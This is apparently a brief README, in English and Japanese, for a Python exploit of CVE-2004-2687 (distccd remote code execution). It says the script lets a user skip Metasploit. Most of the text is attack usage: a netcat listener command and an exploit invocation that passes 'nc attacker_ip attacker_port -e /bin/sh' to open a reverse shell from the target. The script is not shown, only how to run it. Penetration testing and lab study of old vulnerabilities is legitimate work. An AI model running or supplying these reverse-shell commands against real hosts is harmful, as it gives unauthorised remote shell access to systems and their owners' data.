
Manual exploit script for CVE-2004-2687 (distccd RCE) that spawns a reverse shell via netcat without Metasploit, targeting remote hosts for penetration testing.
このスクリプトの目的は、Metasploitを使用せずに手動で行うことです。
使用方法:
nc -lvnp 4466
エクスプロイトの実行:
python3 ./exploit.py -t target_ip -p target_port -c "nc attacker_ip attacker_port -e /bin/sh"